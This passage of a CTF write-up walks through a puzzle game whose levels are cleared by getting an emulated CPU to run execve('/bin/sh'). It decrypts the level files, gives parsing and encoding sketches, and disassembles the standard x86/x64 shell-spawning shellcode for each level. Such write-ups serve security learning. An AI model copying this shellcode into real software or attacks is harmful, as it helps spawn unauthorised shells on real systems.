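	"errors"
	"fmt"
)

// machine is a hypothetical model of the cpu block's state.
type machine struct {
	arch string // set while some "cpu is [arch]" rule holds, else ""
	run  bool   // true while "cpu is run" holds
	pc   int    // address under the cpu block
}

var errSegfault = errors.New("segfault: cpu is run, but no architecture is set")

// onMove is called once per player move (arrow key or Space). step stands in
// for "execute the instruction at pc for this arch and return the next pc".
func (m *machine) onMove(step func(arch string, pc int) int) error {
	if !m.run {
		return nil // nothing executes without "cpu is run"
	}
	if m.arch == "" {
		return errSegfault
	}
	m.pc = step(m.arch, m.pc)
	return nil
}

func main() {
	// Pretend every instruction is one byte long.
	nop := func(arch string, pc int) int { return pc + 1 }

	m := machine{arch: "x64", run: true}
	m.onMove(nop)
	m.onMove(nop)
	fmt.Println(m.pc) // 2

	noArch := machine{run: true}
	fmt.Println(noArch.onMove(nop)) // segfault: cpu is run, but no architecture is set
}
</code></pre>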

<p>The level was cleared when a syscall to <code class="language-plaintext highlighter-rouge">SYS_EXECV</code> was invoked with an argument that was either <code class="language-plaintext highlighter-rouge">/bin/sh</code> or <code class="language-plaintext highlighter-rouge">/bin/bash</code> after being normalized by <code class="language-plaintext highlighter-rouge">os.path.abspath</code> in Python. For example, on the <code class="language-plaintext highlighter-rouge">x64</code> arch, we would pass the level if we could do three things: put the address of a string <code class="language-plaintext highlighter-rouge">/bin/sh</code> in <code class="language-plaintext highlighter-rouge">rdi</code>, put 0x3b (the <code class="language-plaintext highlighter-rouge">execve</code> syscall number) in <code class="language-plaintext highlighter-rouge">al</code>, and then invoke <code class="language-plaintext highlighter-rouge">syscall</code>.</p>
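<p>Here is a sketch of that win check, under two assumptions. First, the syscall numbers are the standard Linux <code class="language-plaintext highlighter-rouge">execve</code> numbers (0x3b on x86-64, 0xb on 32-bit x86). Second, Go’s <code class="language-plaintext highlighter-rouge">path.Clean</code> stands in for <code class="language-plaintext highlighter-rouge">os.path.abspath</code>. The two are close but not identical; for instance, <code class="language-plaintext highlighter-rouge">path.Clean</code> does not turn relative paths into absolute ones. The function name <code class="language-plaintext highlighter-rouge">clearsLevel</code> is made up.</p>

<pre><code class="language-go">package main

import (
	"fmt"
	"path"
)

// execveNR holds the Linux execve syscall numbers for the two architectures
// in this write-up: 0x3b (59) on x86-64 and 0x0b (11) on 32-bit x86.
var execveNR = map[string]int{"x64": 0x3b, "x86": 0x0b}

// clearsLevel is a made-up sketch of the win check. path.Clean stands in for
// os.path.abspath: it collapses "//" and resolves "." and "..", but it does
// not turn relative paths into absolute ones.
func clearsLevel(arch string, nr int, arg string) bool {
	want, ok := execveNR[arch]
	if !ok || nr != want {
		return false
	}
	switch path.Clean(arg) {
	case "/bin/sh", "/bin/bash":
		return true
	}
	return false
}

func main() {
	fmt.Println(clearsLevel("x64", 0x3b, "/bin//sh"))         // true
	fmt.Println(clearsLevel("x86", 0x0b, "/usr/../bin/bash")) // true
	fmt.Println(clearsLevel("x64", 0x0b, "/bin/sh"))          // false: 0x0b is not execve on x86-64
}
</code></pre>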

<h3 id="level-file-decryption">Level File Decryption</h3>

<p>The level file decryption was inside the file <code class="language-plaintext highlighter-rouge">utils.py</code> after unpacking and decompiling. It looked something like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">zlib</span>

<span class="k">def</span> <span class="nf">load_level_data</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>
    <span class="n">key</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'</span><span class="s">zero</span><span class="sh">'</span>
    <span class="n">l</span> <span class="o">=</span> <span class="nf">len</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
    <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="sh">'</span><span class="s">rb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="c1"># the first 3 bytes are skipped</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="nf">read</span><span class="p">()[</span><span class="mi">3</span><span class="p">:]</span>
        <span class="c1"># undo the repeating-key XOR with b'zero'</span>
        <span class="n">compressed</span> <span class="o">=</span> <span class="nf">bytearray</span><span class="p">((</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="n">key</span><span class="p">[(</span><span class="n">i</span> <span class="o">%</span> <span class="n">l</span><span class="p">)]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nf">len</span><span class="p">(</span><span class="n">data</span><span class="p">))))</span>
        <span class="c1"># then inflate the zlib stream</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">zlib</span><span class="p">.</span><span class="nf">decompress</span><span class="p">(</span><span class="n">compressed</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">data</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="sh">'</span><span class="s">utf8</span><span class="sh">'</span><span class="p">)</span>
</code></pre></div></div>

<p>With this figured out, we could view the level files in clear text. Level 1’s file after decryption looked like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Ready Player One
W wall
w _WALL
I ice
i _ICE
Z zero
s _is
t _STOP
z _ZERO
m _YOU
1 cpu
c _CPU
x _x64
b _BUG
r _RUN
B bug

1........................  90 48 83 c4 50 50 48 bb 2f 62 69 6e 2f 2f 73 68 53 54 5f b0 3b 0f 05
IIIIIIIIIIIIIIIIIIIIIIIII  
zsm...................ist
.........................
.......IIIIIIIIIII.......
.......I.........I.......
.......I....s....I.......
.......I...cxr...I.......
.......I....s....I.......
.......I.........I.......
.......I....Z....I.......
.......IIIIIIIIIII.......
.........................
.........................
.........................
.........................
</code></pre></div></div>

<p>The first line is the title of the level. The lines up to the first empty line are a legend that says what each character stands for on the board below. After that comes a \(25 \times 15\) board made of ASCII characters. Each row is followed by at most \(25\) hex values giving the memory contents of that row, and trailing <code class="language-plaintext highlighter-rouge">00</code>s are omitted.</p>
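<p>The format is simple enough to parse by hand. Below is a sketch of such a parser. The <code class="language-plaintext highlighter-rouge">Level</code> type and <code class="language-plaintext highlighter-rouge">parseLevel</code> are made up. The parser assumes that board characters never include spaces (true for the file above), so the first space on a row separates the board from its hex values.</p>

<pre><code class="language-go">package main

import (
	"fmt"
	"strconv"
	"strings"
)

const (
	boardCols = 25
	boardRows = 15
)

// Level is a hypothetical in-memory form of a decrypted level file.
type Level struct {
	Title  string
	Legend map[byte]string   // board character, e.g. 'W', to its name, e.g. "wall"
	Board  [boardRows]string // 25 characters per row
	Memory [boardRows * boardCols]byte
}

// parseLevel sketches a parser for the clear-text level format described above.
func parseLevel(text string) (*Level, error) {
	// The header (title and legend) ends at the first empty line.
	header, boardText, ok := strings.Cut(text, "\n\n")
	if !ok {
		return nil, fmt.Errorf("no empty line after the legend")
	}
	headerLines := strings.Split(header, "\n")
	lv := new(Level)
	lv.Title = headerLines[0]
	lv.Legend = map[byte]string{}
	for _, line := range headerLines[1:] {
		ch, name, ok := strings.Cut(line, " ") // e.g. "W wall"
		if !ok || len(ch) != 1 {
			return nil, fmt.Errorf("bad legend line %q", line)
		}
		lv.Legend[ch[0]] = name
	}

	rows := strings.Split(strings.TrimRight(boardText, "\n"), "\n")
	if len(rows) != boardRows {
		return nil, fmt.Errorf("want %d board rows, got %d", boardRows, len(rows))
	}
	for r, row := range rows {
		// Assumes board characters never contain spaces, so the first space ends them.
		cells, hexPart, _ := strings.Cut(row, " ")
		if len(cells) != boardCols {
			return nil, fmt.Errorf("row %d: want %d cells, got %d", r, boardCols, len(cells))
		}
		lv.Board[r] = cells
		var vals []byte
		for _, field := range strings.Fields(hexPart) {
			v, err := strconv.ParseUint(field, 16, 8)
			if err != nil {
				return nil, fmt.Errorf("row %d: %w", r, err)
			}
			vals = append(vals, byte(v))
		}
		// Omitted trailing values stay 0; copy's count reveals overlong rows.
		if copy(lv.Memory[r*boardCols:(r+1)*boardCols], vals) != len(vals) {
			return nil, fmt.Errorf("row %d: more than %d bytes", r, boardCols)
		}
	}
	return lv, nil
}

func main() {
	// A tiny made-up level: a cpu block ('1') in the top-left corner, and
	// memory starting with nop (90) followed by syscall (0f 05).
	board := "1" + strings.Repeat(".", boardCols-1) + "  90 0f 05\n" +
		strings.Repeat(strings.Repeat(".", boardCols)+"\n", boardRows-1)
	lv, err := parseLevel("Tiny Level\n1 cpu\n\n" + board)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println(lv.Title, lv.Legend['1'], lv.Memory[0:4]) // Tiny Level cpu [144 15 5 0]
}
</code></pre>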

<p>We could also build custom levels by reversing what <code class="language-plaintext highlighter-rouge">load_level_data</code> does, and alter the existing levels to make testing out solutions much easier.</p>
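<p>XOR with the same key is its own inverse. Building a level file therefore amounts to three steps: compress the text with zlib, XOR it with <code class="language-plaintext highlighter-rouge">zero</code>, and prepend three bytes. Here is a Go sketch of both directions with made-up function names. <code class="language-plaintext highlighter-rouge">load_level_data</code> ignores the first three bytes, so their meaning is unknown here. The sketch takes them as a parameter; copying them from an original level file is presumably the safest choice.</p>

<pre><code class="language-go">package main

import (
	"bytes"
	"compress/zlib"
	"fmt"
	"io"
)

// levelKey is the repeating XOR key from load_level_data.
var levelKey = []byte("zero")

// xorKey XORs data with the repeating key; applying it twice restores the input.
func xorKey(data []byte) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ levelKey[i%len(levelKey)]
	}
	return out
}

// decodeLevel mirrors load_level_data: skip 3 bytes, undo the XOR, inflate.
func decodeLevel(file []byte) (string, error) {
	r := bytes.NewReader(file)
	var skipped [3]byte
	if _, err := io.ReadFull(r, skipped[:]); err != nil {
		return "", fmt.Errorf("file too short: %w", err)
	}
	rest, err := io.ReadAll(r)
	if err != nil {
		return "", err
	}
	zr, err := zlib.NewReader(bytes.NewReader(xorKey(rest)))
	if err != nil {
		return "", err
	}
	defer zr.Close()
	plain, err := io.ReadAll(zr)
	return string(plain), err
}

// encodeLevel reverses decodeLevel. The meaning of the 3 skipped bytes is
// unknown, so the caller supplies them, e.g. copied from an original level file.
func encodeLevel(prefix [3]byte, text string) ([]byte, error) {
	buf := new(bytes.Buffer)
	zw := zlib.NewWriter(buf)
	if _, err := zw.Write([]byte(text)); err != nil {
		return nil, err
	}
	if err := zw.Close(); err != nil { // Close flushes the stream and writes the checksum
		return nil, err
	}
	return append(prefix[:], xorKey(buf.Bytes())...), nil
}

func main() {
	enc, err := encodeLevel([3]byte{}, "My Level\n")
	if err != nil {
		fmt.Println(err)
		return
	}
	dec, err := decodeLevel(enc)
	fmt.Println(dec == "My Level\n", err == nil) // true true
}
</code></pre>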

<h2 id="playing-the-game">Playing the Game</h2>

<p>Back to the first level: there was only one <code class="language-plaintext highlighter-rouge">cpu</code> block and one <code class="language-plaintext highlighter-rouge">x64</code> arch block we could use. That meant we had to first form <code class="language-plaintext highlighter-rouge">cpu is x64</code> and then form <code class="language-plaintext highlighter-rouge">cpu is run</code> without breaking the first rule. Recall that rules were read from left to right AND from top to bottom. Therefore, we could put <code class="language-plaintext highlighter-rouge">cpu</code> in the upper-left corner, where it could be used by two rules at the same time, something like this:</p>

\[\begin{matrix}
\texttt{cpu} &amp; \texttt{is} &amp; \texttt{x64}\\
\texttt{is}\\
\texttt{run} 
\end{matrix}\]

<p>After I did that and moved around to execute the instructions, we cleared the level. But before we go to the next level, let’s first take a look at the shellcode for the first level:</p>

<pre><code class="language-asm">0:  90                      nop
1:  48 83 c4 50             add    rsp,0x50
5:  50                      push   rax
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 53                      push   rbx
11: 54                      push   rsp
12: 5f                      pop    rdi
13: b0 3b                   mov    al,0x3b
15: 0f 05                   syscall
</code></pre>

<p>As we can see, this is a pretty standard shellcode that makes a syscall with <code class="language-plaintext highlighter-rouge">al</code> set to <code class="language-plaintext highlighter-rouge">0x3b</code> and <code class="language-plaintext highlighter-rouge">rdi</code> pointing to the string <code class="language-plaintext highlighter-rouge">/bin//sh</code> in memory. The extra slash does not matter because <code class="language-plaintext highlighter-rouge">os.path.abspath</code> in Python normalizes it away.</p>
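<p>To see where <code class="language-plaintext highlighter-rouge">/bin//sh</code> comes from, lay the <code class="language-plaintext highlighter-rouge">movabs</code> immediate out in memory the way x86-64 stores it, lowest byte first. The doubled slash is the usual shellcode trick for padding the path to exactly eight bytes, one full register. Here is a sketch with the made-up helper <code class="language-plaintext highlighter-rouge">immToString</code>:</p>

<pre><code class="language-go">package main

import (
	"encoding/binary"
	"fmt"
)

// immToString writes a 64-bit immediate into memory little-endian (lowest
// byte first, as x86-64 does) and reads those eight bytes back as text.
func immToString(imm uint64) string {
	var buf [8]byte
	binary.LittleEndian.PutUint64(buf[:], imm)
	return string(buf[:])
}

func main() {
	// Operand of `movabs rbx, 0x68732f2f6e69622f`, which `push rbx` then stores on the stack.
	fmt.Println(immToString(0x68732f2f6e69622f)) // /bin//sh
}
</code></pre>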

<h3 id="flatline">Flatline</h3>

<p>This time we had an <code class="language-plaintext highlighter-rouge">x86</code> machine, and a quick disassembly gave us</p>

<pre><code class="language-asm">0:  83 c4 20                add    esp,0x20
3:  50                      push   eax
4:  68 2f 2f 73 68          push   0x68732f2f
9:  68 2f 62 69 6e          push   0x6e69622f
e:  89 e3                   mov    ebx,esp
10: 89 c1                   mov    ecx,eax
12: 89 c2                   mov    edx,eax
14: b0 0b                   mov    al,0xb
16: cd 80                   int    0x80
</code></pre>

<p>That we had a completely valid shellcode here already, so the only thing we needed to do is to run <code class="language-plaintext highlighter-rouge">cpu</code>. The only <code class="language-plaintext highlighter-rouge">cpu is run</code> was at the left side of the game board, so we had to get there. However, we were surrounded by a wall of virus blocks, and <code class="language-plaintext highlighter-rouge">virus</code> had two rules enforced on them at the start of the game: <code class="language-plaintext highlighter-rouge">virus is stop</code> and <code class="language-plaintext highlighter-rouge">virus is kill</code>. We could only disable <code class="language-plaintext highlighter-rouge">virus is stop</code> by pushing away any of the blocks in that rule, but after that, when we tried to step onto a virus block, we would be killed immediately with a “game over” screen.</p>

<p>It seemed impossible to disable the rule from inside the “virus jail,” yet we had to leave the jail to move the block away, so it was a paradox! However, this was just another famous trick in <em>Baba is You</em>: the “kill” property only applies to the player and not to other objects in the game world. Other blocks can therefore move freely through the virus blocks, as long as <code class="language-plaintext highlighter-rouge">virus is stop</code> is not in effect.</p>

<p>The solution then is something like this:</p>

<p><img src="/assets/images/defcon-ctf-2021/zero-lvl02-sol.png" alt="zero-lvl02-sol" /></p>

<p>You first line up the blocks horizontally at the bottom. Then you push them from the right so that they push each other and extend out until they reach <code class="language-plaintext highlighter-rouge">virus is stop</code> and split that rule. After that, our Zero can pass through the <code class="language-plaintext highlighter-rouge">virus</code> blocks and push <code class="language-plaintext highlighter-rouge">cpu is run</code> together to finish the level. This strategy came in handy in later levels as well.</p>

<h3 id="ice-crash">ICE Crash</h3>

<p>For this level, we had <code class="language-plaintext highlighter-rouge">cpu is x64</code> and <code class="language-plaintext highlighter-rouge">cpu is run</code> already in effect. However, if we just wandered around and let the program execute, the processor would move to the next line and hit the ice. Because <code class="language-plaintext highlighter-rouge">ice is stop</code> was also in effect, that resulted in a segfault.</p>

<p>Let’s look at this level’s shellcode:</p>

<pre><code class="language-asm">0:  48 83 c4 18             add    rsp,0x18
...
c:  50                      push   rax
...
19: 48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
20: 2f 73 68
23: 53                      push   rbx
24: 54                      push   rsp
25: 5f                      pop    rdi
...
32: b0 3b                   mov    al,0x3b
34: 0f 05                   syscall
</code></pre>

<p>The zeros are hidden because <code class="language-plaintext highlighter-rouge">00 00</code> behaved very much like a <code class="language-plaintext highlighter-rouge">nop</code> in our case. This was a normal shellcode, and if we could execute all of it, we would pass this level. Therefore, we had to somehow make the processor execute the program without being <code class="language-plaintext highlighter-rouge">stop</code>ped.</p>

<p>It looked like there were two <code class="language-plaintext highlighter-rouge">ice is stop</code> rules on the board, so we could just break them up and that would solve the problem, right? A few tries told us that we simply didn’t have enough time to break the blocks up before the processor reached an ice block.</p>

<p>Notice that in all the previous levels, most of the rules we formed looked like <code class="language-plaintext highlighter-rouge">[noun] is [property]</code>. It is also possible to turn one thing into another with a rule of the form <code class="language-plaintext highlighter-rouge">[noun] is [noun]</code>. Looking at the board, <code class="language-plaintext highlighter-rouge">zero is you</code> was exposed to the player, which meant it was possible to form <code class="language-plaintext highlighter-rouge">ice is zero</code> or <code class="language-plaintext highlighter-rouge">ice is you</code> in the game.</p>

<p>In fact, both solutions work. <code class="language-plaintext highlighter-rouge">ice is zero</code> turns the ice into a bunch of Zeros, so nothing stops the processor once the ice blocks are gone. <code class="language-plaintext highlighter-rouge">ice is you</code> lets the player control the <code class="language-plaintext highlighter-rouge">ice</code> blocks, so we could move them out of the way.</p>

<h3 id="high-speed-pizza-delivery">High-speed Pizza Delivery</h3>

<p>Here we had <code class="language-plaintext highlighter-rouge">cpu is x64</code> and <code class="language-plaintext highlighter-rouge">ice is stop</code> at the bottom of the screen, where we could not reach them. We also had a bunch of new blocks that looked like different registers. Ignoring those for now and putting <code class="language-plaintext highlighter-rouge">cpu is run</code> together, we watched the processor reach the end of the shellcode and then throw a segfault. Let’s take a look at the shellcode, then:</p>

<pre><code class="language-asm">0:  90                      nop
1:  90                      nop
2:  48 83 c4 50             add    rsp,0x50
6:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
d:  2f 73 68
10: 50                      push   rax
11: 53                      push   rbx
12: 54                      push   rsp
13: 58                      pop    rax
14: b0 3b                   mov    al,0x3b
16: 0f 05                   syscall
</code></pre>

<p>Huh, everything looked normal. On closer inspection, though, we could see that the address of the string was popped into <code class="language-plaintext highlighter-rouge">rax</code> instead of the expected <code class="language-plaintext highlighter-rouge">rdi</code> register. The newly appeared blocks had register names on them. Putting these together, we realized we needed to form <code class="language-plaintext highlighter-rouge">rax is rdi</code> so that when the machine was executing <code class="language-plaintext highlighter-rouge">pop rax</code>, it was actually executing <code class="language-plaintext highlighter-rouge">pop rdi</code>.</p>
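<p>For reference, the two instructions differ only in their register field. In 64-bit mode, <code class="language-plaintext highlighter-rouge">pop r64</code> for the eight legacy registers is the single byte <code class="language-plaintext highlighter-rouge">0x58 + reg</code>, and <code class="language-plaintext highlighter-rouge">push r64</code> is <code class="language-plaintext highlighter-rouge">0x50 + reg</code>, where <code class="language-plaintext highlighter-rouge">rax</code> is 0 and <code class="language-plaintext highlighter-rouge">rdi</code> is 7. The helper names below are made up for illustration. The sketch only shows the encodings, not how the game implements the <code class="language-plaintext highlighter-rouge">rax is rdi</code> rule internally.</p>

```python
# 3-bit register numbers used by the one-byte push/pop encodings in 64-bit
# mode (registers r8-r15 additionally need a REX prefix, ignored here).
REG_NUMBERS = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3,
               "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7}


def push_opcode(reg):
    """One-byte `push reg` opcode: 0x50 + register number."""
    return 0x50 + REG_NUMBERS[reg]


def pop_opcode(reg):
    """One-byte `pop reg` opcode: 0x58 + register number."""
    return 0x58 + REG_NUMBERS[reg]


# The byte at 0x13 in this level vs. the byte the first level used.
print(hex(pop_opcode("rax")), hex(pop_opcode("rdi")))  # 0x58 0x5f
```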

<p>However, if we formed <code class="language-plaintext highlighter-rouge">rax is rdi</code> first and then let the program run, we still got a segfault. We tried a lot of things, such as using <code class="language-plaintext highlighter-rouge">rdi is rax</code> instead. One of my teammates finally realized that we might want the rule in effect only while that single <code class="language-plaintext highlighter-rouge">pop rax</code> instruction was executing. So he did the following:</p>
<ol>
  <li>Pushed <code class="language-plaintext highlighter-rouge">cpu is run</code> together vertically and let it run to address <samp>0x13</samp>.</li>
  <li>Stopped the run by splitting the blocks.</li>
  <li>Went over to the right side and formed <code class="language-plaintext highlighter-rouge">rdi is rax</code>.</li>
  <li>Came back and continued the run for 1 tick.</li>
  <li>Disabled that rule.</li>
  <li>Came back to run the final <code class="language-plaintext highlighter-rouge">syscall</code>.</li>
</ol>
<p>With that, we finally got it working.</p>

<h3 id="ten-thousands-steps">Ten Thousands Steps</h3>

<p>Well, the title said ten thousand steps, but if you actually used more than 1000 steps, you would get a screen saying you had run out of time.</p>

<p>We were again locked up in a jail, this time made out of ice blocks. However, there was a lock block inside the jail, along with the words <code class="language-plaintext highlighter-rouge">lock is push</code>. We could simply push from left to right to enable that rule and walk out of the jail. Still, if we went straight to <code class="language-plaintext highlighter-rouge">cpu is run</code>, the processor would inevitably stumble onto an ice block and stop running, throwing a segfault.</p>

<p>Taking a closer look at the existing shellcode on the board, I realized we actually had every instruction we needed. They were just scattered around the memory. Based on what we had on the board, I came up with a solution:</p>

<ol>
  <li>Enable <code class="language-plaintext highlighter-rouge">lock is push</code> to escape the jail.</li>
  <li>Push <code class="language-plaintext highlighter-rouge">cpu</code> <code class="language-plaintext highlighter-rouge">is</code> <code class="language-plaintext highlighter-rouge">run</code> all into the jail so that they form <code class="language-plaintext highlighter-rouge">cpu is push</code> horizontally and <code class="language-plaintext highlighter-rouge">cpu is run</code> vertically at the same time. Notice that since <code class="language-plaintext highlighter-rouge">push</code> is at the rightmost edge of the board, it is impossible to push it out.</li>
  <li>Execute the following instructions one by one. Push the processor block to the start of an instruction, go back into the jail to enable <code class="language-plaintext highlighter-rouge">cpu is run</code>, and immediately disable it so that the machine runs exactly one instruction. Then push the processor block to the start of the next instruction we want to execute, and repeat the process.
    <ol>
      <li><code class="language-plaintext highlighter-rouge">48 83 c4 2a</code> (<code class="language-plaintext highlighter-rouge">add rsp,0x2a</code>) to set up the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">48 bf 2f 62 69 6e 2f 2f 73 68</code> (<code class="language-plaintext highlighter-rouge">movabs rdi,0x68732f2f6e69622f</code>) to store the string into <code class="language-plaintext highlighter-rouge">rdi</code>.</li>
      <li><code class="language-plaintext highlighter-rouge">57</code> (<code class="language-plaintext highlighter-rouge">push rdi</code>) to push the string onto the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">54</code> (<code class="language-plaintext highlighter-rouge">push rsp</code>) to push the string’s address onto the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">5f</code> (<code class="language-plaintext highlighter-rouge">pop rdi</code>) to pop the string address back into <code class="language-plaintext highlighter-rouge">rdi</code>.</li>
      <li><code class="language-plaintext highlighter-rouge">6a 3b</code> (<code class="language-plaintext highlighter-rouge">push 0x3b</code>) to push the syscall number onto the stack.</li>
      <li><code class="language-plaintext highlighter-rouge">58</code> (<code class="language-plaintext highlighter-rouge">pop rax</code>) to pop the syscall number back into <code class="language-plaintext highlighter-rouge">rax</code>.</li>
      <li>……</li>
    </ol>
  </li>
</ol>
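<p>As a sanity check of the plan, here is a toy model (not a real x86 emulator) that replays the seven instructions above on a zero-initialized 256-byte stack. The starting <code class="language-plaintext highlighter-rouge">rsp</code> of <code class="language-plaintext highlighter-rouge">0x80</code> and the <code class="language-plaintext highlighter-rouge">ToyCPU</code> class are assumptions for illustration. Note that this chain never writes an explicit NUL terminator after the string. The model gets one for free only because its memory starts out zeroed.</p>

```python
import struct

MASK64 = (1 << 64) - 1


class ToyCPU:
    """Hypothetical register file plus a small byte-addressed stack."""

    def __init__(self, stack_size=0x100, rsp=0x80):
        self.mem = bytearray(stack_size)  # zero-initialized memory
        self.regs = {"rax": 0, "rdi": 0, "rsp": rsp}

    def push(self, value):
        # Decrement rsp, then store the 8-byte value little-endian.
        self.regs["rsp"] -= 8
        addr = self.regs["rsp"]
        self.mem[addr:addr + 8] = struct.pack("<Q", value & MASK64)

    def pop(self):
        addr = self.regs["rsp"]
        (value,) = struct.unpack("<Q", self.mem[addr:addr + 8])
        self.regs["rsp"] += 8
        return value

    def read_cstring(self, addr):
        end = self.mem.index(0, addr)  # first NUL at or after addr
        return bytes(self.mem[addr:end])


cpu = ToyCPU()
cpu.regs["rsp"] += 0x2a                 # add rsp,0x2a
cpu.regs["rdi"] = 0x68732f2f6e69622f    # movabs rdi,0x68732f2f6e69622f
cpu.push(cpu.regs["rdi"])               # push rdi
cpu.push(cpu.regs["rsp"])               # push rsp (pushes the value before the decrement)
cpu.regs["rdi"] = cpu.pop()             # pop rdi
cpu.push(0x3b)                          # push 0x3b
cpu.regs["rax"] = cpu.pop()             # pop rax

print(hex(cpu.regs["rax"]), cpu.read_cstring(cpu.regs["rdi"]))
```

<p>After the chain, <code class="language-plaintext highlighter-rouge">rax</code> holds the syscall number and <code class="language-plaintext highlighter-rouge">rdi</code> points at <code class="language-plaintext highlighter-rouge">/bin//sh</code>, which is exactly the state the final <code class="language-plaintext highlighter-rouge">syscall</code> needs.</p>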

<p>Wait a minute, where’s the syscall instruction? Then my teammate hinted that it was actually hidden under an ice block. A look at the game’s level file confirmed it: the bytes really were hidden under the bottom row of ice blocks. This meant we had to change our strategy up a bit.</p>

<p>My solution went like this. Once we escaped the jail, we would push the <code class="language-plaintext highlighter-rouge">lock</code> text block all the way down to the bottom-left and use the <code class="language-plaintext highlighter-rouge">is</code> block out there to form <code class="language-plaintext highlighter-rouge">ice is lock</code>, turning all the ice blocks into lock blocks. Then we would push the <code class="language-plaintext highlighter-rouge">lock</code> text block all the way back to form <code class="language-plaintext highlighter-rouge">lock is push</code>, so we could push away the jail wall and reveal the syscall instruction bytes. From there, we could continue our plan from step 2.</p>

<p>Finally, we just needed to push the processor block to the revealed <code class="language-plaintext highlighter-rouge">0f 05</code> (<code class="language-plaintext highlighter-rouge">syscall</code>) and let the machine run one last time. In the end, it took me about 750 steps to beat this level by hand.</p>

<h3 id="the-elegant-mantis">The Elegant Mantis</h3>

<p>This level really made my brain hurt. The two blocks with the “recycle” symbol on them flipped the memory with respect to the game board when the player stepped on them. The left one flipped the memory horizontally (the center row didn’t change). The right one flipped it vertically (the center column didn’t change). Therefore, there were four potential shellcodes: the original, one flipped horizontally, one flipped vertically, and one flipped both ways (a 180° rotation).</p>
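<p>Each flip is its own inverse and the two flips commute, so only these four layouts are ever reachable. The sketch below assumes memory is laid out row by row on a rectangular board. The 3×3 example board is made up. One side effect is worth noting: flipping both ways simply reverses the linear byte order.</p>

```python
def flip_horizontal(grid):
    """Mirror top to bottom: row i swaps with row n-1-i, the center row stays."""
    return [list(row) for row in reversed(grid)]


def flip_vertical(grid):
    """Mirror left to right: column j swaps with column m-1-j, the center column stays."""
    return [list(reversed(row)) for row in grid]


def as_bytes(grid):
    """Flatten the board row by row into the linear memory the CPU reads."""
    return bytes(b for row in grid for b in row)


def layouts(grid):
    """All four reachable layouts, keyed by which flips have been applied."""
    return {
        "original": [list(row) for row in grid],
        "horizontal": flip_horizontal(grid),
        "vertical": flip_vertical(grid),
        "both": flip_vertical(flip_horizontal(grid)),  # a 180-degree rotation
    }


board = [
    [0x00, 0x01, 0x02],
    [0x10, 0x11, 0x12],
    [0x20, 0x21, 0x22],
]
for name, grid in layouts(board).items():
    print(f"{name:>10}: {as_bytes(grid).hex(' ')}")
```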

<p>I didn’t solve this level, so I will skip what I tried during the game and talk about how my teammate solved it.</p>

<p>Let’s first analyze the original shellcode:</p>

<pre><code class="language-asm">0:  be 16 00 00 00          mov    esi,0x16
5:  bb 00 00 00 00          mov    ebx,0x0
a:  eb 05                   jmp    0x11
c:  01 db                   add    ebx,ebx
e:  83 c6 01                add    esi,0x1
11: 83 fe 30                cmp    esi,0x30
14: 76 f6                   jbe    0xc
16: 83 ec 90                sub    esp,0xffffff90
19: 08 53 76                or     BYTE PTR [ebx+0x76],dl
1c: f0 83 c4 12             lock add esp,0x12
20: 89 c7                   mov    edi,eax
22: 01 d8                   add    eax,ebx
24: e8 22 5a 55 90          call   0x90555a4b
29: 00 31                   add    BYTE PTR [ecx],dh
2b: c0 81 ea 18 21 4a 33    rol    BYTE PTR [ecx+0x4a2118ea],0x33
32: eb 0d                   jmp    0x41
34: 85 c0                   test   eax,eax
36: 54                      push   esp
37: 83 c4 21                add    esp,0x21
3a: 39 cb                   cmp    ebx,ecx
3c: 75 e8                   jne    0x26
3e: 5d                      pop    ebp
3f: 58                      pop    eax
40: 76 fe                   jbe    0x40
42: 01 db                   add    ebx,ebx
44: 83 ec 01                sub    esp,0x1
47: 01 fc                   add    esp,edi
49: 41                      inc    ecx
4a: 41                      inc    ecx
4b: b8 10 00 00 00          mov    eax,0x10
50: bb 2f 62 69 6e          mov    ebx,0x6e69622f
55: 89 18                   mov    DWORD PTR [eax],ebx
57: bb 2f 73 68 00          mov    ebx,0x68732f
5c: 89 58 04                mov    DWORD PTR [eax+0x4],ebx
5f: 89 c3                   mov    ebx,eax
61: 31 c9                   xor    ecx,ecx
63: 29 d2                   sub    edx,edx
65: b0 0b                   mov    al,0xb
67: cd 80                   int    0x80
</code></pre>

<p>If we just let this shellcode run, the machine would eventually throw a segfault at address <samp>0x24</samp>, because the call target was out of bounds. Taking a closer look at the end of the program, from address <samp>0x4b</samp> to <samp>0x67</samp>, we saw that it actually set up the registers and memory appropriately. That meant we could clear this level if we could somehow get the program counter there.</p>

<p>Therefore, starting from the very beginning, there were four actions we could take at every tick of the game: run the CPU, flip the memory horizontally, flip the memory vertically, or stop the CPU. We used a search algorithm to explore all the different paths. For each path, <em>unicorn</em> (the CPU emulator) told us whether to keep searching or to abandon it because of a segfault.</p>
